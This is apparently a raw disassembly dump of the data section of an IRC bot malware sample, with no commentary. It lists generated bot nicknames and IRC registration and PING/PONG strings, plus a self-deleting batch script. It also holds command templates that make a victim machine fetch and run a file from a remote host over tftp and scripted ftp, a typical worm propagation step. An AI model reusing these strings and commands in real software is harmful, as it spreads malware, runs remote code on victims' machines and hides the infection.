dd offset aSadikaellesme ; "SaDIkaEllesme"
dd offset aAykut1 ; "aykut1"
dd offset aKashmira ; "Kashmira"
dd offset aSeviseli ; "SeViSeLi"
dd offset aSugarboy ; "SUGARBOY-"
dd offset aUzgun36 ; "uzgun36"
dd offset aKumul ; "kumul"
dd offset aAdalim ; "ADALIM"
dd offset aUmut ; "umut-"
dd offset aAnk32M ; "ANK-32-M"
dd offset aDjspace ; "DJSPACE"
dd offset aAnkar ; "Ankar"
dd offset aFenerlee ; "FeNeRLee"
dd offset aHayran ; "hayran"
dd offset aAngelgirl ; "angelgirl"
dd offset aKapk ; "kapk"
dd offset aAchilles ; "Achilles"
dd offset aTegmen ; "TEGMEN"
dd offset aKotan ; "kotan"
dd offset aSevda ; "sevda"
dd offset off_4508B8
dd offset aAlcatras ; "alcatras"
dd offset aA44m ; "a44m"
dd offset aBirsen ; "birsen"
dd offset aYabanc ; "yabanc"
dd offset aDevre ; "devre"
dd offset aErkan ; "erkan"
dd offset aAnkm ; "ankM"
dd offset aAdem28 ; "Adem28"
dd offset aMaxsilla ; "maxsilla"
dd offset aM41ist ; "M41IST"
dd offset aAdamm33 ; "AdAMM33"
dd offset aFirtina ; "firtina"
dd offset aAta29 ; "Ata29"
dd offset aKoray ; "KORAY"
dd offset aAkden ; "akden"
dd offset aIzmirlm ; "izmirlm"
dd offset aUla ; "ula"
dd offset aNeHaber ; "NE-HABER"
dd offset aPassenger ; "passenger"
dd offset aTropikal ; "tropikal"
dd offset aCool30m ; "cool30m"
dd offset aCem39 ; "cem39"
dd offset aRerpjj ; "RERPJJ"
dd offset aTeoman ; "TEOMAN```"
dd offset aDallas43m ; "DALLAS43M"
dd offset aPrometheus ; "prometheus"
dd offset aMaveRIck ; "MaVe{R}icK"
dd offset aAdamm ; "ADAMM"
dd offset aCumhur29 ; "cumhur29"
dd offset aWantedlove ; "WANTEDLOVE"
; char *off_45025C
off_45025C dd offset aSex_1 ; DATA XREF: sub_418688+41�r
; sub_418688+EC�r
; "sex"
dd offset aLez ; "lez"
dd offset aZex ; "zex"
dd offset aTree ; "tree"
dd offset aBad ; "bad"
dd offset aLag ; "lag"
dd offset aTambe ; "|tambe|"
dd offset aWoh ; "|woh|"
dd offset aTot ; "-|tot|"
dd offset aSuck ; "|suck|"
dd offset aLuck ; "|luck|"
dd offset aHub ; "{hub}"
dd offset aSex_0 ; "{sex}"
dd offset aGens ; "{gens|"
dd offset aLuvuF ; "||luvu-f|"
dd offset aWiked ; "|wiked|"
dd offset aSick ; "sick}}"
dd offset aQ8 ; "Q8"
dd offset aQ8A ; "|q8|a"
dd offset aB ; "b"
dd offset aC_5 ; "c"
dd offset aD_2 ; "d"
dd offset aE_0 ; "e"
dd offset aF ; "f"
dd offset aG ; "g"
dd offset asc_450A70 ; "h"
dd offset aI_1 ; "i"
dd offset a__11 ; "_"
dd offset aJ_1 ; "j"
dd offset aK_0 ; "k"
dd offset asc_450A84 ; "l"
dd offset aM_2 ; "m"
dd offset aN_0 ; "n"
dd offset aO_0 ; "o"
dd offset aP_0 ; "p"
dd offset aQ_0 ; "q"
dd offset aRs ; "rs"
dd offset aT_0 ; "t"
dd offset aU_0 ; "u"
dd offset aV_0 ; "v"
dd offset aW ; "w"
dd offset asc_450AB0 ; "x"
dd offset aY ; "y"
dd offset aZ ; "z"
dd offset aHappy ; "happy"
dd offset aRg ; "rg"
dd offset aTy ; "ty"
dd offset aGf ; "gf"
dd offset aRt ; "rt"
dd offset aSdf ; "sdf"
dd offset aUi ; "ui"
dd offset aLuvy ; "luvy"
dd offset aTrimy ; "trimy"
dd offset aTruck ; "truck"
dd offset aMuckc ; "muckc"
dd offset aZ_0 ; "z"
dd offset aG_0 ; "g"
dd offset aS_40 ; "s"
dd offset aQ_1 ; "q"
dd offset aBrb ; "BRB"
dd offset aBbl ; "|bbl"
dd offset dword_4F3A8C
dd offset dword_4F3A90
dd offset a___0 ; "_|_"
dd offset dword_4F3A94
dd offset dword_4F3A98
dd offset dword_4F3A9C
dd offset dword_4F3AA0
dd offset aF_0 ; "F"
dd offset aM_3 ; "M"
dd offset aLuvu ; "LUVU"
dd offset aSad ; "Sad"
dd offset aF_1 ; "^^^f^"
dd offset aB_0 ; "b"
dd offset dword_4F3AA4
dd offset aSleeping ; "Sleeping"
dd offset dword_4F3AA8
dd offset dword_4F3AAC
dd offset aFuck_0 ; "Fuck"
dd offset aFree_0 ; "Free"
dd offset dword_4F3AB0
dd offset dword_4F3AB4
dd offset asc_450B58 ; "X"
dd offset dword_4F3AB8
dd offset aBoy ; "BOY"
dd offset aGirl_0 ; "GIRL"
dd offset aGurl ; "gurl"
dd offset aShit ; "shit"
dd offset aAha ; "aha"
dd offset aYeah ; "yeah"
dd offset aMuha ; "muha"
dd offset aMof0 ; "mof0"
dd offset aMofo ; "mofo"
dd offset aTot_0 ; "tot"
dd offset aLol ; "lol"
dd offset aLoloA ; "lolo|a|"
dd offset aSex4free ; "|sex4free|"
dd offset a4us ; "|4us|"
dd offset a4you ; "{4you}"
dd offset a4u ; "|4u|"
dd offset a5u ; "5u"
dd offset a6u ; "6u"
dword_4503F4 dd 71h ; DATA XREF: .data:off_44FF5C�o
dword_4503F8 dd 77h ; DATA XREF: .data:0044FF60�o
dword_4503FC dd 65h ; DATA XREF: .data:0044FF64�o
dword_450400 dd 72h ; DATA XREF: .data:0044FF68�o
dword_450404 dd 74h ; DATA XREF: .data:0044FF6C�o
dword_450408 dd 79h ; DATA XREF: .data:0044FF70�o
dword_45040C dd 75h ; DATA XREF: .data:0044FF74�o
dword_450410 dd 69h ; DATA XREF: .data:0044FF78�o
dword_450414 dd 70h ; DATA XREF: .data:0044FF7C�o
dword_450418 dd 61h ; DATA XREF: .data:0044FF80�o
dword_45041C dd 73h ; DATA XREF: .data:0044FF84�o
dword_450420 dd 64h ; DATA XREF: .data:0044FF88�o
dword_450424 dd 66h ; DATA XREF: .data:0044FF8C�o
dword_450428 dd 67h ; DATA XREF: .data:0044FF90�o
dword_45042C dd 68h ; DATA XREF: .data:0044FF94�o
dword_450430 dd 6Ah ; DATA XREF: .data:0044FF98�o
dword_450434 dd 6Bh ; DATA XREF: .data:0044FF9C�o
dword_450438 dd 6Ch ; DATA XREF: .data:0044FFA0�o
dword_45043C dd 7Ah ; DATA XREF: .data:0044FFA4�o
dword_450440 dd 78h ; DATA XREF: .data:0044FFA8�o
dword_450444 dd 63h ; DATA XREF: .data:0044FFAC�o
dword_450448 dd 76h ; DATA XREF: .data:0044FFB0�o
dword_45044C dd 62h ; DATA XREF: .data:0044FFB4�o
dword_450450 dd 6Eh ; DATA XREF: .data:0044FFB8�o
dword_450454 dd 6Dh ; DATA XREF: .data:0044FFBC�o
dword_450458 dd 51h ; DATA XREF: .data:0044FFC0�o
dword_45045C dd 57h ; DATA XREF: .data:0044FFC4�o
dword_450460 dd 45h ; DATA XREF: .data:0044FFC8�o
dword_450464 dd 52h ; DATA XREF: .data:0044FFCC�o
dword_450468 dd 54h ; DATA XREF: .data:0044FFD0�o
dword_45046C dd 59h ; DATA XREF: .data:0044FFD4�o
dword_450470 dd 55h ; DATA XREF: .data:0044FFD8�o
dword_450474 dd 49h ; DATA XREF: .data:0044FFDC�o
dword_450478 dd 4Fh ; DATA XREF: .data:0044FFE0�o
dword_45047C dd 50h ; DATA XREF: .data:0044FFE4�o
dword_450480 dd 41h ; DATA XREF: .data:0044FFE8�o
dword_450484 dd 53h ; DATA XREF: .data:0044FFEC�o
dword_450488 dd 44h ; DATA XREF: .data:0044FFF0�o
dword_45048C dd 46h ; DATA XREF: .data:0044FFF4�o
dword_450490 dd 47h ; DATA XREF: .data:0044FFF8�o
dword_450494 dd 48h ; DATA XREF: .data:0044FFFC�o
dword_450498 dd 4Ah ; DATA XREF: .data:00450000�o
dword_45049C dd 4Bh ; DATA XREF: .data:00450004�o
dword_4504A0 dd 4Ch ; DATA XREF: .data:00450008�o
dword_4504A4 dd 5Ah ; DATA XREF: .data:0045000C�o
dword_4504A8 dd 58h ; DATA XREF: .data:00450010�o
dword_4504AC dd 43h ; DATA XREF: .data:00450014�o
dword_4504B0 dd 56h ; DATA XREF: .data:00450018�o
dword_4504B4 dd 42h ; DATA XREF: .data:0045001C�o
dword_4504B8 dd 4Eh ; DATA XREF: .data:00450020�o
dword_4504BC dd 4Dh ; DATA XREF: .data:00450024�o
aSmartmir db 'SMARTMIR',0 ; DATA XREF: .data:00450028�o
align 4
aFarooq db 'farooq',0 ; DATA XREF: .data:0045002C�o
align 4
aMaxxguy db 'maxxguy',0 ; DATA XREF: .data:00450030�o
aBobmarley db 'BOBMARLEY',0 ; DATA XREF: .data:00450034�o
align 4
aEmilya db 'emilya',0 ; DATA XREF: .data:00450038�o
align 10h
aKrizha db 'KRIZHA',0 ; DATA XREF: .data:0045003C�o
align 4
aCar1nna db 'Car1nna',0 ; DATA XREF: .data:00450040�o
aSwin db 'swin',0 ; DATA XREF: .data:00450044�o
align 4
aMale db 'male',0 ; DATA XREF: .data:00450048�o
align 10h
aKoko db 'koko',0 ; DATA XREF: .data:0045004C�o
align 4
aFlexster db 'flexster',0 ; DATA XREF: .data:00450050�o
align 4
aKen db 'ken',0 ; DATA XREF: .data:00450054�o
aShez db 'Shez',0 ; DATA XREF: .data:00450058�o
align 10h
aTalika db 'talika',0 ; DATA XREF: .data:0045005C�o
align 4
aMarcy db 'marcy',0 ; DATA XREF: .data:00450060�o
align 10h
aCme db 'cme',0 ; DATA XREF: .data:00450064�o
aHeval db 'heval',0 ; DATA XREF: .data:00450068�o
align 4
aBunty db 'bunty',0 ; DATA XREF: .data:0045006C�o
align 4
aJanno db 'janno',0 ; DATA XREF: .data:00450070�o
align 4
aRimpy db 'rimpy',0 ; DATA XREF: .data:00450074�o
align 4
aNastysha db 'nastysha',0 ; DATA XREF: .data:00450078�o
align 10h
aLuisa db 'Luisa',0 ; DATA XREF: .data:0045007C�o
align 4
aTroller db 'troller',0 ; DATA XREF: .data:00450080�o
aManee db 'manee',0 ; DATA XREF: .data:00450084�o
align 4
aKermit db 'kermit',0 ; DATA XREF: .data:00450088�o
align 10h
aPuregold db 'puregold',0 ; DATA XREF: .data:0045008C�o
align 4
aCoredump db 'CoreDump',0 ; DATA XREF: .data:00450090�o
align 4
aImra db 'imra',0 ; DATA XREF: .data:00450094�o
align 10h
aGirl db 'GirL',0 ; DATA XREF: .data:00450098�o
align 4
aCamel db 'CAMEL',0 ; DATA XREF: .data:0045009C�o
align 10h
aReshma db 'reshma',0 ; DATA XREF: .data:004500A0�o
align 4
aKencing db 'Kencing',0 ; DATA XREF: .data:004500A4�o
aThr45h3r5 db 'THR45H3R5',0 ; DATA XREF: .data:004500A8�o
align 4
aCansuuuu db 'cansuuuu',0 ; DATA XREF: .data:004500AC�o
align 4
aKaan38dent db 'kaan38dent',0 ; DATA XREF: .data:004500B0�o
align 4
aErkan27 db 'erkan27',0 ; DATA XREF: .data:004500B4�o
aHexaaa db 'hexaaa',0 ; DATA XREF: .data:004500B8�o
align 4
aBerk19 db 'berk19',0 ; DATA XREF: .data:004500BC�o
align 4
aObenibisevse db 'OBeNiBiSeVSe',0 ; DATA XREF: .data:004500C0�o
align 4
aIrmal db 'irmal',0 ; DATA XREF: .data:004500C4�o
align 4
aMisssunday db 'misssunday',0 ; DATA XREF: .data:004500C8�o
align 10h
aTolga34 db 'Tolga34',0 ; DATA XREF: .data:004500CC�o
aJericho db 'JERICHO',0 ; DATA XREF: .data:004500D0�o
aMary_0 db 'MARY',0 ; DATA XREF: .data:004500D4�o
align 4
aAkin db 'AKIN',0 ; DATA XREF: .data:004500D8�o
align 10h
aMelekk db 'melekk',0 ; DATA XREF: .data:004500DC�o
align 4
aTrend3 db 'trend3',0 ; DATA XREF: .data:004500E0�o
align 10h
aMERVE db 'M-E-R-V-E',0 ; DATA XREF: .data:004500E4�o
align 4
aTekir db 'tekir',0 ; DATA XREF: .data:004500E8�o
align 4
aVenedik34 db 'venedik34',0 ; DATA XREF: .data:004500EC�o
align 10h
aSevmekmi db 'sevmekmi',0 ; DATA XREF: .data:004500F0�o
align 4
aSudenur db 'SUDENUR',0 ; DATA XREF: .data:004500F4�o
aArzu db 'ARZU',0 ; DATA XREF: .data:004500F8�o
align 4
aHaticem db 'haticem',0 ; DATA XREF: .data:004500FC�o
aErnesto db 'ERNESTO',0 ; DATA XREF: .data:00450100�o
aAslii db 'aslii',0 ; DATA XREF: .data:00450104�o
align 4
aPiramit db 'PIRAMIT',0 ; DATA XREF: .data:00450108�o
aSamyeli21 db 'samyeli21',0 ; DATA XREF: .data:0045010C�o
align 4
aRetg db 'RETG',0 ; DATA XREF: .data:00450110�o
align 10h
aBlackpearl db 'blackpearl',0 ; DATA XREF: .data:00450114�o
align 4
aPelincik db 'pelincik',0 ; DATA XREF: .data:00450118�o
align 4
aAhmet db 'ahmet',0 ; DATA XREF: .data:0045011C�o
align 10h
aTurkyy db 'turkyy',0 ; DATA XREF: .data:00450120�o
align 4
aAnk32m db 'ank32m',0 ; DATA XREF: .data:00450124�o
align 10h
aZack db 'ZACK',0 ; DATA XREF: .data:00450128�o
align 4
aIzmir39m db 'Izmir39m',0 ; DATA XREF: .data:0045012C�o
align 4
aAlbina db 'albina',0 ; DATA XREF: .data:00450130�o
align 4
aAyla db 'AYLA-',0 ; DATA XREF: .data:00450134�o
align 4
off_450724 dd offset byte_457441 ; DATA XREF: .data:00450138�o
aAnkh db 'ankh',0 ; DATA XREF: .data:0045013C�o
align 10h
aDonjuanm db 'Donjuanm',0 ; DATA XREF: .data:00450140�o
align 4
aBogac db 'bogac',0 ; DATA XREF: .data:00450144�o
align 4
aAlpay34m db 'alpay34m',0 ; DATA XREF: .data:00450148�o
align 10h
aCongueror db 'CoNGuERoR',0 ; DATA XREF: .data:0045014C�o
align 4
aDenizlim db 'DenizliM',0 ; DATA XREF: .data:00450150�o
align 4
aBerk19m db 'Berk19m',0 ; DATA XREF: .data:00450154�o
aDevran db 'devran',0 ; DATA XREF: .data:00450158�o
align 4
aArda db 'arda',0 ; DATA XREF: .data:0045015C�o
align 10h
aKeyiflisert db 'keyifliSERT',0 ; DATA XREF: .data:00450160�o
aMurat34M db 'murat34-m',0 ; DATA XREF: .data:00450164�o
align 4
aHakan3 db 'hakan3',0 ; DATA XREF: .data:00450168�o
align 10h
aImirzali db 'IMIRZALI--',0 ; DATA XREF: .data:0045016C�o
align 4
aRamtha db 'RAMTHA',0 ; DATA XREF: .data:00450170�o
align 4
aEmre db 'Emre--',0 ; DATA XREF: .data:00450174�o
align 4
aElmaazyok db 'elmaazyok',0 ; DATA XREF: .data:00450178�o
align 4
aEsmerkiz db 'Esmerkiz',0 ; DATA XREF: .data:0045017C�o
align 4
aKebikec db 'kebikec',0 ; DATA XREF: .data:00450180�o
aFlord db 'FLoRD',0 ; DATA XREF: .data:00450184�o
align 4
aHoly db 'holy',0 ; DATA XREF: .data:00450188�o
align 4
aMahinur db 'MAHINUR',0 ; DATA XREF: .data:0045018C�o
aSadikaellesme db 'SaDIkaEllesme',0 ; DATA XREF: .data:00450190�o
align 4
aAykut1 db 'aykut1',0 ; DATA XREF: .data:00450194�o
align 4
aKashmira db 'Kashmira',0 ; DATA XREF: .data:00450198�o
align 4
aSeviseli db 'SeViSeLi',0 ; DATA XREF: .data:0045019C�o
align 4
aSugarboy db 'SUGARBOY-',0 ; DATA XREF: .data:004501A0�o
align 10h
aUzgun36 db 'uzgun36',0 ; DATA XREF: .data:004501A4�o
aKumul db 'kumul',0 ; DATA XREF: .data:004501A8�o
align 10h
aAdalim db 'ADALIM',0 ; DATA XREF: .data:004501AC�o
align 4
aUmut db 'umut-',0 ; DATA XREF: .data:004501B0�o
align 10h
aAnk32M db 'ANK-32-M',0 ; DATA XREF: .data:004501B4�o
align 4
aDjspace db 'DJSPACE',0 ; DATA XREF: .data:004501B8�o
aAnkar db 'Ankar',0 ; DATA XREF: .data:004501BC�o
align 4
aFenerlee db 'FeNeRLee',0 ; DATA XREF: .data:004501C0�o
align 4
aHayran db 'hayran',0 ; DATA XREF: .data:004501C4�o
align 10h
aAngelgirl db 'angelgirl',0 ; DATA XREF: .data:004501C8�o
align 4
aKapk db 'kapk',0 ; DATA XREF: .data:004501CC�o
align 4
aAchilles db 'Achilles',0 ; DATA XREF: .data:004501D0�o
align 10h
aTegmen db 'TEGMEN',0 ; DATA XREF: .data:004501D4�o
align 4
aKotan db 'kotan',0 ; DATA XREF: .data:004501D8�o
align 10h
aSevda db 'sevda',0 ; DATA XREF: .data:004501DC�o
align 4
off_4508B8 dd offset byte_4B5245 ; DATA XREF: .data:004501E0�o
aAlcatras db 'alcatras',0 ; DATA XREF: .data:004501E4�o
align 4
aA44m db 'a44m',0 ; DATA XREF: .data:004501E8�o
align 10h
aBirsen db 'birsen',0 ; DATA XREF: .data:004501EC�o
align 4
aYabanc db 'yabanc',0 ; DATA XREF: .data:004501F0�o
align 10h
aDevre db 'devre',0 ; DATA XREF: .data:004501F4�o
align 4
aErkan db 'erkan',0 ; DATA XREF: .data:004501F8�o
align 10h
aAnkm db 'ankM',0 ; DATA XREF: .data:004501FC�o
align 4
aAdem28 db 'Adem28',0 ; DATA XREF: .data:00450200�o
align 10h
aMaxsilla db 'maxsilla',0 ; DATA XREF: .data:00450204�o
align 4
aM41ist db 'M41IST',0 ; DATA XREF: .data:00450208�o
align 4
aAdamm33 db 'AdAMM33',0 ; DATA XREF: .data:0045020C�o
aFirtina db 'firtina',0 ; DATA XREF: .data:00450210�o
aAta29 db 'Ata29',0 ; DATA XREF: .data:00450214�o
align 4
aKoray db 'KORAY',0 ; DATA XREF: .data:00450218�o
align 4
aAkden db 'akden',0 ; DATA XREF: .data:0045021C�o
align 4
aIzmirlm db 'izmirlm',0 ; DATA XREF: .data:00450220�o
aUla db 'ula',0 ; DATA XREF: .data:00450224�o
aNeHaber db 'NE-HABER',0 ; DATA XREF: .data:00450228�o
align 4
aPassenger db 'passenger',0 ; DATA XREF: .data:0045022C�o
align 10h
aTropikal db 'tropikal',0 ; DATA XREF: .data:00450230�o
align 4
aCool30m db 'cool30m',0 ; DATA XREF: .data:00450234�o
aCem39 db 'cem39',0 ; DATA XREF: .data:00450238�o
align 4
aRerpjj db 'RERPJJ',0 ; DATA XREF: .data:0045023C�o
align 4
aTeoman db 'TEOMAN```',0 ; DATA XREF: .data:00450240�o
align 10h
aDallas43m db 'DALLAS43M',0 ; DATA XREF: .data:00450244�o
align 4
aPrometheus db 'prometheus',0 ; DATA XREF: .data:00450248�o
align 4
aMaveRIck db 'MaVe{R}icK',0 ; DATA XREF: .data:0045024C�o
align 4
aAdamm db 'ADAMM',0 ; DATA XREF: .data:00450250�o
align 4
aCumhur29 db 'cumhur29',0 ; DATA XREF: .data:00450254�o
align 4
aWantedlove db 'WANTEDLOVE',0 ; DATA XREF: .data:00450258�o
align 4
aSex_1 db 'sex',0 ; DATA XREF: .data:off_45025C�o
aLez db 'lez',0 ; DATA XREF: .data:00450260�o
aZex db 'zex',0 ; DATA XREF: .data:00450264�o
aTree db 'tree',0 ; DATA XREF: .data:00450268�o
align 4
aBad db 'bad',0 ; DATA XREF: .data:0045026C�o
aLag db 'lag',0 ; DATA XREF: .data:00450270�o
aTambe db '|tambe|',0 ; DATA XREF: .data:00450274�o
aWoh db '|woh|',0 ; DATA XREF: .data:00450278�o
align 10h
aTot db '-|tot|',0 ; DATA XREF: .data:0045027C�o
align 4
aSuck db '|suck|',0 ; DATA XREF: .data:00450280�o
align 10h
aLuck db '|luck|',0 ; DATA XREF: .data:00450284�o
align 4
aHub db '{hub}',0 ; DATA XREF: .data:00450288�o
align 10h
aSex_0 db '{sex}',0 ; DATA XREF: .data:0045028C�o
align 4
aGens db '{gens|',0 ; DATA XREF: .data:00450290�o
align 10h
aLuvuF db '||luvu-f|',0 ; DATA XREF: .data:00450294�o
align 4
aWiked db '|wiked|',0 ; DATA XREF: .data:00450298�o
aSick db 'sick}}',0 ; DATA XREF: .data:0045029C�o
align 4
aQ8 db 'Q8',0 ; DATA XREF: .data:004502A0�o
align 10h
aQ8A db '|q8|a',0 ; DATA XREF: .data:004502A4�o
align 4
aB: ; DATA XREF: .data:004502A8�o
unicode 0, <b>,0
aC_5: ; DATA XREF: .data:004502AC�o
unicode 0, <c>,0
aD_2: ; DATA XREF: .data:004502B0�o
unicode 0, <d>,0
aE_0: ; DATA XREF: .data:004502B4�o
unicode 0, <e>,0
aF: ; DATA XREF: .data:004502B8�o
unicode 0, <f>,0
aG: ; DATA XREF: .data:004502BC�o
unicode 0, <g>,0
asc_450A70: ; DATA XREF: .data:004502C0�o
unicode 0, <h>,0
aI_1: ; DATA XREF: .data:004502C4�o
unicode 0, <i>,0
a__11: ; DATA XREF: .data:004502C8�o
unicode 0, <_>,0
aJ_1: ; DATA XREF: .data:004502CC�o
unicode 0, <j>,0
aK_0: ; DATA XREF: .data:004502D0�o
unicode 0, <k>,0
asc_450A84: ; DATA XREF: .data:004502D4�o
unicode 0, <l>,0
aM_2: ; DATA XREF: .data:004502D8�o
unicode 0, <m>,0
aN_0: ; DATA XREF: .data:004502DC�o
unicode 0, <n>,0
aO_0: ; DATA XREF: .data:004502E0�o
unicode 0, <o>,0
aP_0: ; DATA XREF: .data:004502E4�o
unicode 0, <p>,0
aQ_0: ; DATA XREF: .data:004502E8�o
unicode 0, <q>,0
aRs db 'rs',0 ; DATA XREF: .data:004502EC�o
align 10h
aT_0: ; DATA XREF: .data:004502F0�o
unicode 0, <t>,0
aU_0: ; DATA XREF: .data:004502F4�o
unicode 0, <u>,0
aV_0: ; DATA XREF: .data:004502F8�o
unicode 0, <v>,0
aW: ; DATA XREF: .data:004502FC�o
unicode 0, <w>,0
asc_450AB0: ; DATA XREF: .data:00450300�o
unicode 0, <x>,0
aY: ; DATA XREF: .data:00450304�o
unicode 0, <y>,0
aZ: ; DATA XREF: .data:00450308�o
unicode 0, <z>,0
aHappy db 'happy',0 ; DATA XREF: .data:0045030C�o
align 4
aRg db 'rg',0 ; DATA XREF: .data:00450310�o
align 4
aTy db 'ty',0 ; DATA XREF: .data:00450314�o
align 4
aGf db 'gf',0 ; DATA XREF: .data:00450318�o
align 10h
aRt db 'rt',0 ; DATA XREF: .data:0045031C�o
align 4
aSdf db 'sdf',0 ; DATA XREF: .data:00450320�o
aUi db 'ui',0 ; DATA XREF: .data:00450324�o
align 4
aLuvy db 'luvy',0 ; DATA XREF: .data:00450328�o
align 4
aTrimy db 'trimy',0 ; DATA XREF: .data:0045032C�o
align 4
aTruck db 'truck',0 ; DATA XREF: .data:00450330�o
align 4
aMuckc db 'muckc',0 ; DATA XREF: .data:00450334�o
align 4
aZ_0: ; DATA XREF: .data:00450338�o
unicode 0, <z>,0
aG_0: ; DATA XREF: .data:0045033C�o
unicode 0, <g>,0
aS_40: ; DATA XREF: .data:00450340�o
unicode 0, <s>,0
aQ_1: ; DATA XREF: .data:00450344�o
unicode 0, <q>,0
aBrb db 'BRB',0 ; DATA XREF: .data:00450348�o
aBbl db '|bbl',0 ; DATA XREF: .data:0045034C�o
align 4
a___0 db '_|_',0 ; DATA XREF: .data:00450358�o
aF_0: ; DATA XREF: .data:0045036C�o
unicode 0, <F>,0
aM_3: ; DATA XREF: .data:00450370�o
unicode 0, <M>,0
aLuvu db 'LUVU',0 ; DATA XREF: .data:00450374�o
align 4
aSad db 'Sad',0 ; DATA XREF: .data:00450378�o
aF_1 db '^^^f^',0 ; DATA XREF: .data:0045037C�o
align 4
aB_0: ; DATA XREF: .data:00450380�o
unicode 0, <b>,0
aSleeping db 'Sleeping',0 ; DATA XREF: .data:00450388�o
align 4
aFuck_0 db 'Fuck',0 ; DATA XREF: .data:00450394�o
align 10h
aFree_0 db 'Free',0 ; DATA XREF: .data:00450398�o
align 4
asc_450B58: ; DATA XREF: .data:004503A4�o
unicode 0, <X>,0
aBoy db 'BOY',0 ; DATA XREF: .data:004503AC�o
aGirl_0 db 'GIRL',0 ; DATA XREF: .data:004503B0�o
align 4
aGurl db 'gurl',0 ; DATA XREF: .data:004503B4�o
align 10h
aShit db 'shit',0 ; DATA XREF: .data:004503B8�o
align 4
aAha db 'aha',0 ; DATA XREF: .data:004503BC�o
aYeah db 'yeah',0 ; DATA XREF: .data:004503C0�o
align 4
aMuha db 'muha',0 ; DATA XREF: .data:004503C4�o
align 4
aMof0 db 'mof0',0 ; DATA XREF: .data:004503C8�o
align 4
aMofo db 'mofo',0 ; DATA XREF: .data:004503CC�o
align 4
aTot_0 db 'tot',0 ; DATA XREF: .data:004503D0�o
aLol db 'lol',0 ; DATA XREF: .data:004503D4�o
aLoloA db 'lolo|a|',0 ; DATA XREF: .data:004503D8�o
aSex4free db '|sex4free|',0 ; DATA XREF: .data:004503DC�o
align 4
a4us db '|4us|',0 ; DATA XREF: .data:004503E0�o
align 10h
a4you db '{4you}',0 ; DATA XREF: .data:004503E4�o
align 4
a4u db '|4u|',0 ; DATA XREF: .data:004503E8�o
align 10h
a5u db '5u',0 ; DATA XREF: .data:004503EC�o
align 4
a6u db '6u',0 ; DATA XREF: .data:004503F0�o
align 4
; char asc_450BD8[]
asc_450BD8 db 0Ah,0 ; DATA XREF: sub_418331+6�o
align 4
; char asc_450BDC[]
asc_450BDC db ' ',0 ; DATA XREF: sub_418378+C�o
align 10h
; char asc_450BE0[]
asc_450BE0 db ' ',0 ; DATA XREF: sub_418378:loc_41839E�o
align 4
; char aPing_1[]
aPing_1 db 'PING',0 ; DATA XREF: sub_418378+52�o
align 4
aPongS_0 db 'PONG %s',0Ah,0 ; DATA XREF: sub_418378+63�o
align 4
; char a433[]
a433 db '433',0 ; DATA XREF: sub_418378:loc_4183E2�o
; char a432[]
a432 db '432',0 ; DATA XREF: sub_418378+7B�o
; char aNickS_9[]
aNickS_9 db 'NICK %s',0Ah,0 ; DATA XREF: sub_418378+B3�o
align 4
; char aNickSUserSHotm[]
aNickSUserSHotm db 'NICK %s',0Ah ; DATA XREF: sub_418465+9B�o
db 'USER %s "hotmail.com" "127.0.0.1" :%s',0Ah,0
align 4
; char a__3[]
a__3 db '-|`_\{[]}',0 ; DATA XREF: sub_418688+BC�o
; sub_418688+175�r ...
align 4
dword_450C48 dd 30B0005h, 10h, 48h, 1, 16D016D0h, 0 ; DATA XREF: .text:00418B75�o
dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_450C94 dd 3000005h, 10h, 18h, 1, 3 dup(0) ; DATA XREF: .text:00418BB4�o
dword_450CB0 dd 975201B0h, 11D059CAh, 0A000D5A8h, 51800DC9h, 0
; DATA XREF: .text:00418BE9�o
dword_450CC4 dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
; DATA XREF: .text:00418C10�o
; char aSErrorSD_[]
aSErrorSD_ db '%s Error: %s <%d>.',0 ; DATA XREF: sub_418E9D+72�o
align 4
aMirc_2 db 'mIRC',0 ; DATA XREF: sub_418F62+5�o
align 4
aMirc_3 db 'mIRC',0 ; DATA XREF: sub_418F62+18�o
align 4
aExplorer_exe db 'explorer.exe',0 ; DATA XREF: sub_418FE7+1C�o
align 4
aSS_11 db '%s %s',0 ; DATA XREF: .text:004190D0�o
align 4
aSeshutdownpriv db 'SeShutdownPrivilege',0 ; DATA XREF: sub_41910C+2�o
; char aSdel_bat[]
aSdel_bat db '%sdel.bat',0 ; DATA XREF: sub_41912E+48�o
align 4
; char a[]
a@echoOffRepeat db '@echo off',0Dh,0Ah ; DATA XREF: sub_41912E+85�o
db ':repeat',0Dh,0Ah
db 'del "%%1"',0Dh,0Ah
db 'if exist "%%1" goto repeat',0Dh,0Ah
db 'del "%s"',0
; char aComspecCSS[]
aComspecCSS db '%%comspec%% /c %s %s',0 ; DATA XREF: sub_41912E+140�o
align 10h
; char asc_450D90[]
asc_450D90 db '-' ; DATA XREF: sub_4192B6+5C�o
db 3, 34h, 2
dd 2676F6Ch, 25202D03h, 6F6C2073h, 6C632067h, 65726165h
dd 64h
unk_450DAC db 2Dh ; - ; DATA XREF: sub_4192B6+8F�o
db 3, 34h, 2
db 6Ch ; l
db 6Fh, 67h, 2
db 3
aFailedWithErro db '- failed with error code %d',0
align 4
; char asc_450DD4[]
asc_450DD4 db '-' ; DATA XREF: sub_4192B6+9C�o
db 3, 34h, 2
db 6Ch ; l
db 6Fh, 67h, 2
db 3
aOperatingSyste db '- operating system is not supported',0
align 4
aTftpISGetSS db 'tftp -i %s get %s &%s',0Dh,0Ah,0 ; DATA XREF: .text:00419416�o
aEchoOpenSDOE_0 db 'echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &echo qu'
; DATA XREF: .text:0041943F�o
db 'it >> o &ftp -n -s:o &%s',0Dh,0Ah,0
aNetapi32_dll_0 db 'netapi32.dll',0 ; DATA XREF: sub_4194A9+58�o
align 4
aNetmessagebu_0 db 'NetMessageBufferSend',0 ; DATA XREF: sub_4194A9+65�o
align 10h
off_450EA0 dd offset dword_450EF4 ; DATA XREF: sub_4195C6+60�r
; sub_41999D+51�r ...
off_450EA4 dd offset aAdded ; DATA XREF: sub_4195C6+2D�r
; sub_41999D+83�r ...
; "Added"
dword_450EA8 dd 0 ; DATA XREF: sub_4195C6+18�r
dd offset aDelete_1 ; "Delete"
dd offset aDeleted ; "Deleted"
align 8
dd offset aList_1 ; "List"
dd offset aListed ; "Listed"
dd 0
dd offset aStart_0 ; "Start"
dd offset aStarted ; "Started"
align 10h
dd offset aStop_0 ; "Stop"
dd offset aStopped_0 ; "Stopped"
dd 1
dd offset aPause_0 ; "Pause"
dd offset aPaused_0 ; "Paused"
